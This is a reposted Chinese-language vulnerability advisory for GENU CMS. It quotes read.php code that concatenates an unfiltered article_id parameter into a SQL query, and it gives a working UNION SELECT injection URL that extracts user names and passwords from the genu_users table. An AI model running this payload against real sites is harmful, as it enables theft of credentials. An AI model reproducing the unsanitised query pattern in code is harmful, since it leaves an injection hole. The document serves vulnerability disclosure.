来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-GENU CMS SQL Injection Vulnerability-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-漏洞发现者:h0rd h0rd[at]null.net www.2cto.com下载地址:http://w......
|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GENU CMS SQL Injection Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 漏洞发现者:h0rd h0rd[at]null.net www.2cto.com 下载地址:http://www.gnew.fr/pages/download.php?file=GENU-2012.3.tar.gz 缺陷页面read.php 缺陷代码分析: [...] include('./../includes/common.php'); page_header($lang['ARTICLES_READ_TITLE']); if (isset($_GET['article_id'])) { $sql->query('SELECT ' . TABLE_ARTICLES . '.article_date, ' . TABLE_ARTICLES . '.article_subject, ' . TABLE_ARTICLES . '.article_text, ' . TABLE_USERS . '.user_id, ' . TABLE_USERS . '.user_name FROM ' . TABLE_ARTICLES . ', ' . TABLE_USERS . ' WHERE ' . TABLE_ARTICLES . '.user_id = ' . TABLE_USERS . '.user_id AND ' . TABLE_ARTICLES . '.article_id = ' . $_GET['article_id']); $table_articles = $sql->fetch(); [...] 测试方法 http://[ www.2cto.com ]/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users-- 修复: 加强过滤 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
